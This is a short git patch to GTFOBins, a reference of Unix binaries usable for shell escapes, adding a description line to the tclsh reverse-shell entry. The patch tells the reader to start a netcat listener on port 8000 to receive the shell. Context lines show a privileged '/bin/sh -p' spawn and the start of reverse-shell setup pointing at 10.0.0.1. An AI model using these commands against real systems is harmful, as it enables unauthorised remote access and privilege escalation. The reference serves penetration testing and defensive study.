From 5f5598b1c340f70f6ab33bd10a61a7e138a2cc22 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Tue, 22 May 2018 22:07:10 +0100 Subject: [PATCH] Add tclsh reverse shell description --- _gtfobins/tclsh.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index a292ad7..b625ca5 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -13,7 +13,7 @@ functions: ./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr reverse-shell: - - description: + - description: Run `nc -l -p 8000` to receive the shell on the other end. code: | export RHOST=10.0.0.1 export RPORT=8000